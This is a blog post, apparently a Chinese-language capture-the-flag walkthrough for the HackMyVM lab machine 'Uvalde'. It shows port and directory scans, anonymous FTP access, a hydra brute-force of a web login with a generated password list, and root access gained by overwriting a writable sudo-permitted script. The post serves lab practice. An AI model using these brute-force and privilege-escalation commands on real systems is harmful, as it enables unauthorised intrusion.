{"id":645,"date":"2024-04-27T16:12:20","date_gmt":"2024-04-27T08:12:20","guid":{"rendered":"http:\/\/162.14.82.114\/?p=645"},"modified":"2024-04-27T16:12:20","modified_gmt":"2024-04-27T08:12:20","slug":"hmv-_-uvalde","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/645\/04\/27\/2024\/","title":{"rendered":"hmv[-_-]Uvalde"},"content":{"rendered":"

Uvalde<\/h1>\n

\"image-20240427122447882\"<\/div>
\n
\"image-20240427152546346\"<\/div><\/p>\n

\u4fe1\u606f\u641c\u96c6<\/h2>\n

\u7aef\u53e3\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/uvalde]\n\u2514\u2500$ rustscan -a 192.168.0.169 -- -A\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\n\ud83c\udf0dHACK THE PLANET\ud83c\udf0d\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.0.169:21\nOpen 192.168.0.169:22\nOpen 192.168.0.169:80\n\nPORT   STATE SERVICE REASON  VERSION\n21\/tcp open  ftp     syn-ack vsftpd 3.0.3\n| ftp-syst: \n|   STAT: \n| FTP server status:\n|      Connected to ::ffff:192.168.0.143\n|      Logged in as ftp\n|      TYPE: ASCII\n|      No session bandwidth limit\n|      Session timeout in seconds is 300\n|      Control connection is plain text\n|      Data connections will be plain text\n|      At session startup, client count was 4\n|      vsFTPd 3.0.3 - secure, fast, stable\n|_End of status\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n|_-rw-r--r--    1 1000     1000         5154 Jan 28  2023 output\n22\/tcp open  ssh     syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)\n| ssh-hostkey: \n|   3072 3a:09:a4:da:d7:db:99:ee:a5:51:05:e9:af:e7:08:90 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCwDnSxIl0SNgzPsXkJAfzKgtv2Jy+3IdPPdLRGucjD4fwZvcnbLLM9XzZnEMhdmAbuWm4qT\/QZEbSOyg3UmlYybDGk8wvRtY6+s5hBnQWPbqZTWN7CtqLAPQbhx\/KL1PHahHuvu9piRWXRza102rqsvEuX3XBhdDV73tL8ngTaqYJEUJHrMJqODd\/rXdaIwcT90kF\/kukma7lFlHv6+dA2MBA59y4L0fs4nES5+XCbAPJJ3yB2GILwWKflQmU7An5AhtwmB1nuhv\/oAGvV9BkG082vfT3T49LLNrkg2fi5nPw8lKMiDddz1qvz2CReMoxYZOoAyUcxyrAN5WCFo1HzJipGxf\/qxOpmVh7lhRThyIGdwcsJ6lmB0l\/BEOChPVm2ux+7EyFl7DxaMprno627MytgitbnrP3KPUddDpsyCu3EPt9YGZFMCzwrn63bmdpr8\/NBGpIrXtW4oc0ngy9Cbv3z+QMzazo1tk76QBtSb7E5jLxhhaSvnpqx3oTsg3M=\n|   256 cb:42:6a:be:22:13:2c:f2:57:f9:80:d1:f7:fb:88:5c (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCiKKMWzMD5bn1iwSt234hUCqks2vX4KPFWQsG7Q9cswKGOwtB6Jz\/fu0mrCknLESb5\/z\/rR1VcjzCNbN8dMGKw=\n|   256 44:3c:b4:0f:aa:c3:94:fa:23:15:19:e3:e5:18:56:94 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEUHG4hWsuKYMFJ8wOg6oLV1Xoz5fen+aVoTW03mmsv2\n80\/tcp open  http    syn-ack Apache httpd 2.4.54 ((Debian))\n|_http-server-header: Apache\/2.4.54 (Debian)\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-title: Agency - Start Bootstrap Theme\nService Info: OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n
\u76ee\u5f55\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/uvalde]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.169\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.169\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,zip,bak,jpg,txt,html\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php                 (Status: 403) [Size: 278]\n\/.html                (Status: 403) [Size: 278]\n\/index.php            (Status: 200) [Size: 29604]\n\/img                  (Status: 301) [Size: 312] [--> http:\/\/192.168.0.169\/img\/]\n\/login.php            (Status: 200) [Size: 1022]\n\/user.php             (Status: 302) [Size: 0] [--> login.php]\n\/mail                 (Status: 301) [Size: 313] [--> http:\/\/192.168.0.169\/mail\/]\n\/css                  (Status: 301) [Size: 312] [--> http:\/\/192.168.0.169\/css\/]\n\/js                   (Status: 301) [Size: 311] [--> http:\/\/192.168.0.169\/js\/]\n\/success.php          (Status: 302) [Size: 0] [--> login.php]\n\/vendor               (Status: 301) [Size: 315] [--> http:\/\/192.168.0.169\/vendor\/]\n\/create_account.php   (Status: 200) [Size: 1003]\n\/.html                (Status: 403) [Size: 278]\n\/.php                 (Status: 403) [Size: 278]\n\/server-status        (Status: 403) [Size: 278]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n
\u8e29\u70b9<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/uvalde]\n\u2514\u2500$ whatweb 192.168.0.169                                                \nhttp:\/\/192.168.0.169 [200 OK] Apache[2.4.54], Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache\/2.4.54 (Debian)], IP[192.168.0.169], JQuery, Script, Title[Agency - Start Bootstrap Theme]<\/code><\/pre>\n
\"image-20240427152930515\"<\/div><\/p>\n
FTP\u63a2\u6d4b<\/h3>\n
ftp<\/code>\u533f\u540d\u767b\u5f55\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/uvalde]\n\u2514\u2500$ ftp 192.168.0.169\nConnected to 192.168.0.169.\n220 (vsFTPd 3.0.3)\nName (192.168.0.169:kali): ftp\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> ls -la\n229 Entering Extended Passive Mode (|||60101|)\n150 Here comes the directory listing.\ndrwxr-xr-x    2 0        116          4096 Jan 28  2023 .\ndrwxr-xr-x    2 0        116          4096 Jan 28  2023 ..\n-rw-r--r--    1 1000     1000         5154 Jan 28  2023 output\n226 Directory send OK.\nftp> get output\nlocal: output remote: output\n229 Entering Extended Passive Mode (|||52075|)\n150 Opening BINARY mode data connection for output (5154 bytes).\n100% |***********************************************************************************************************|  5154      194.02 KiB\/s    00:00 ETA\n226 Transfer complete.\n5154 bytes received in 00:00 (188.99 KiB\/s)\nftp> exit\n221 Goodbye.<\/code><\/pre>\n
\"image-20240427153116986\"<\/div><\/p>\n
\u8349\uff0c\u795e\u4e4e\u5176\u6280\uff01<\/p>\n
\u654f\u611f\u76ee\u5f55<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/uvalde]\n\u2514\u2500$ curl http:\/\/192.168.0.169\/mail        \n<!DOCTYPE HTML PUBLIC "-\/\/IETF\/\/DTD HTML 2.0\/\/EN">\n<html><head>\n<title>301 Moved Permanently<\/title>\n<\/head><body>\n<h1>Moved Permanently<\/h1>\n<p>The document has moved <a href="http:\/\/192.168.0.169\/mail\/">here<\/a>.<\/p>\n<hr>\n<address>Apache\/2.4.54 (Debian) Server at 192.168.0.169 Port 80<\/address>\n<\/body><\/html>\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/uvalde]\n\u2514\u2500$ curl http:\/\/192.168.0.169\/mail\/\n<!DOCTYPE HTML PUBLIC "-\/\/W3C\/\/DTD HTML 3.2 Final\/\/EN">\n<html>\n <head>\n  <title>Index of \/mail<\/title>\n <\/head>\n <body>\n<h1>Index of \/mail<\/h1>\n  <table>\n   <tr><th valign="top"><img src="\/icons\/blank.gif" alt="[ICO]"><\/th><th><a href="?C=N;O=D">Name<\/a><\/th><th><a href="?C=M;O=A">Last modified<\/a><\/th><th><a href="?C=S;O=A">Size<\/a><\/th><th><a href="?C=D;O=A">Description<\/a><\/th><\/tr>\n   <tr><th colspan="5"><hr><\/th><\/tr>\n<tr><td valign="top"><img src="\/icons\/back.gif" alt="[PARENTDIR]"><\/td><td><a href="\/">Parent Directory<\/a><\/td><td> <\/td><td align="right">  - <\/td><td> <\/td><\/tr>\n<tr><td valign="top"><img src="\/icons\/unknown.gif" alt="[   ]"><\/td><td><a href="contact_me.php">contact_me.php<\/a><\/td><td align="right">2023-01-31 20:27  <\/td><td align="right">1.2K<\/td><td> <\/td><\/tr>\n   <tr><th colspan="5"><hr><\/th><\/tr>\n<\/table>\n<address>Apache\/2.4.54 (Debian) Server at 192.168.0.169 Port 80<\/address>\n<\/body><\/html><\/code><\/pre>\n
\u521b\u5efa\u65b0\u8d26\u6237<\/h3>\n
\"image-20240427153847012\"<\/div>
\n
\"image-20240427153855035\"<\/div><\/p>\n
\u6210\u529f\u8fa3\uff01\u4f46\u662f\u4e3a\u5565\u6ca1\u5bc6\u7801\u3002\u3002\u3002\u3002\u91cd\u65b0\u521b\u4e00\u4e2a\uff1a<\/p>\n
\"image-20240427154042766\"<\/div><\/p>\n
\u89e3\u5bc6\u4e00\u4e0b\u3002\u3002\u3002\u3002<\/p>\n
\"image-20240427154127795\"<\/div><\/p>\n
username=hack12138&password=hack121382024@4774<\/code><\/pre>\n
\u5c1d\u8bd5\u7206\u7834<\/h3>\n
\u77e5\u9053\u5bc6\u7801\u7684\u521b\u5efa\u65b9\u6cd5\u4e86\uff0c\u5c1d\u8bd5\u5bf9\u7528\u6237matthew<\/code>\u521b\u5efa\u7c7b\u4f3c\u7684\u5bc6\u7801\u5c1d\u8bd5\u7206\u7834\uff1a<\/p>\n
for i in {0001..9999}; do echo "matthew2024@$i"; done > pass.txt<\/code><\/pre>\n
\u8003\u8651\u5230\u524d\u9762\u63d0\u5230\u662fmatthew<\/code>\u662f2023\u5e74\u4e4b\u524d\u521b\u4f5c\u7684\uff0c\u6dfb\u52a0\u4e00\u4e0b\u5176\u4ed6\u5e74\u4efd\u7684\u5bc6\u7801\uff1a<\/p>\n
for i in {0001..9999}; do echo "matthew2023@$i"; done >> pass.txt\nfor i in {0001..9999}; do echo "matthew2022@$i"; done >> pass.txt<\/code><\/pre>\n
\"image-20240427155618700\"<\/div><\/p>\n
\u6293\u5305\u770b\u4e00\u4e0b\uff1a<\/p>\n
\"image-20240427155733334\"<\/div><\/p>\n
\u7206\u7834\uff1a<\/p>\n
hydra -l matthew -P pass.txt 192.168.0.169 http-post-form '\/login.php:username=matthew&password=^PASS^:<input type="submit" value="Login">' <\/code><\/pre>\n
\"image-20240427160716966\"<\/div><\/p>\n
\u627e\u5230\u5bc6\u7801\uff0c\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n
\"image-20240427160216795\"<\/div><\/p>\n
\u63d0\u6743<\/h2>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\n
matthew@uvalde:~$ sudo -l\nMatching Defaults entries for matthew on uvalde:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser matthew may run the following commands on uvalde:\n    (ALL : ALL) NOPASSWD: \/bin\/bash \/opt\/superhack\nmatthew@uvalde:~$ cat \/opt\/superhack\n#! \/bin\/bash \nclear -x\n\nGRAS=$(tput bold)\nJAUNE=$(tput setaf 3)$GRAS\nBLANC=$(tput setaf 7)$GRAS\nBLEU=$(tput setaf 4)$GRAS\nVERT=$(tput setaf 2)$GRAS\nROUGE=$(tput setaf 1)$GRAS\nRESET=$(tput sgr0)\n\ncat << EOL\n\n _______  __   __  _______  _______  ______    __   __  _______  _______  ___   _ \n|       ||  | |  ||       ||       ||    _ |  |  | |  ||   _   ||       ||   | | |\n|  _____||  | |  ||    _  ||    ___||   | ||  |  |_|  ||  |_|  ||       ||   |_| |\n| |_____ |  |_|  ||   |_| ||   |___ |   |_||_ |       ||       ||       ||      _|\n|_____  ||       ||    ___||    ___||    __  ||       ||       ||      _||     |_ \n _____| ||       ||   |    |   |___ |   |  | ||   _   ||   _   ||     |_ |    _  |\n|_______||_______||___|    |_______||___|  |_||__| |__||__| |__||_______||___| |_|\n\nEOL\n\nprintf "${BLANC}Tool:${RESET} ${BLEU}superHack${RESET}\\n"\nprintf "${BLANC}Author:${RESET} ${BLEU}hackerman${RESET}\\n"\nprintf "${BLANC}Version:${RESET} ${BLEU}1.0${RESET}\\n"\n\nprintf "\\n"\n\n[[ $# -ne 0 ]] && echo -e "${BLEU}Usage:${RESET} $0 domain" && exit\n\nwhile [ -z "$domain" ]; do\nread -p "${VERT}domain to hack:${RESET} " domain\ndone\n\nprintf "\\n"\n\nn=50\n\nstring=""\nfor ((i=0; i<$n; i++))\ndo\nstring+="."\ndone\n\nfor ((i=0; i<$n; i++))\ndo\nstring="${string\/.\/#}"\nprintf "${BLANC}Hacking progress...:${RESET} ${BLANC}[$string]${RESET}\\r"\nsleep .09\ndone\n\nprintf "\\n"\nprintf "${JAUNE}Target $domain ====> PWNED${RESET}\\n"\nprintf "${JAUNE}URL: https:\/\/$domain\/*********************.php${RESET}\\n"\n\necho -e "\\n${ROUGE}Pay 0.000047 BTC to 3FZbgi29cpjq2GjdwV8eyHuJJnkLtktZc5 to unlock backdoor.${RESET}\\n"<\/code><\/pre>\n
\u770b\u4e00\u4e0b\u6743\u9650\uff0c\u53d1\u73b0\u6709\u5199\u7684\u6743\u9650\uff0c\u5c1d\u8bd5\u5199\u4e00\u4e2a\u8fdb\u884c\u6267\u884c\uff01<\/p>\n
matthew@uvalde:\/opt$ mv superhack backup\nmatthew@uvalde:\/opt$ echo 'bash' > superhack\nmatthew@uvalde:\/opt$ sudo -l\nMatching Defaults entries for matthew on uvalde:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser matthew may run the following commands on uvalde:\n    (ALL : ALL) NOPASSWD: \/bin\/bash \/opt\/superhack\nmatthew@uvalde:\/opt$ sudo \/bin\/bash \/opt\/superhack\nroot@uvalde:\/opt# cd \/root\nroot@uvalde:~# ls -la\ntotal 28\ndrwx------  4 root root 4096 Feb  5  2023 .\ndrwxr-xr-x 18 root root 4096 Jan 22  2023 ..\nlrwxrwxrwx  1 root root    9 Jan 22  2023 .bash_history -> \/dev\/null\n-rw-r--r--  1 root root  571 Jan 31  2023 .bashrc\ndrwx------  2 root root 4096 Feb  3  2023 .config\ndrwxr-xr-x  3 root root 4096 Jan 31  2023 .local\n-rw-r--r--  1 root root  161 Jan 31  2023 .profile\n-rwx------  1 root root   33 Jan 31  2023 root.txt\nroot@uvalde:~# cat root.txt \n59ec54537e98a53691f33e81500f56da<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
Uvalde \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/uvalde] \u2514\u2500$ rus […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-645","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/645","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=645"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/645\/revisions"}],"predecessor-version":[{"id":646,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/645\/revisions\/646"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=645"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=645"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=645"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}